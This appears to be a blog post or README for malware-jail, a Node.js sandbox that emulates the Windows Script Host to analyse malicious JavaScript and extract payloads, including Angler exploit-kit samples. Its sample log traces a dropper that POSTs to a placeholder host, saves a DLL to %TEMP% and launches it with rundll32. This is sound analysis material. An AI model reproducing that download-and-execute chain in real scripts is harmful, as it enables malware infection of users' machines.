Malware-Jail - Sandbox for semi-automatic Javascript malware analysis and payload extraction

Friday, March 4, 2016

Sandbox for semi-automatic Javascript malware analysis and payload extraction. Written for Node.js
malware-jail is written for Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .

Runs on any operating system, tested on Linux (Node v4.2.1).

Prerequisites
You'll need Node.js and npm .
malware-jail requires minimist , and xmlhttprequest and entities npm packages, you may install them with:
npm install
or
npm install minimist xmlhttprequest entities

Warning
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

Usage
bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 -       -e ifile ... js that simulates specific environment
11 Jan 00:07:39 -       -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 -       -s odir  ... output directory for generated files (malware payload)
11 Jan 00:07:39 -       --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 -       malware  ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json
In the examples folder you may find a deactivated malware file. Run the analysis with:
node jailme.js malware/example.js
or just simply:
node jailme.js
Internet browser based malware you may test with
node jailme.js malware/example_browser.js
The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:
  • _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
  • _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
  • _wscript_urls - all URLs that the malware intended to GET or POST.
  • _wscript_objects - WScript or ActiveX objects created.
_'sandbox_dump_after.json' uses JSONPath , implemented by JSON-js/cycle.js , to save duplicated or cyclic references to a same object.

Sample output
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json
In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Example: Analysing Angler EK
Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html .
Strip the non Angler part and save as malware/angler_stripped.html .
Remove <script> tags and convert required <div> tags into:
document._addElementById(id, content);
and save as malware/angler.js .
Run the analysis:
node jailme.js malware/angler.js
Eventually capture the output:
node jailme.js malware/angler.js > angler_log.txt




Subscribe via e-mail for updates!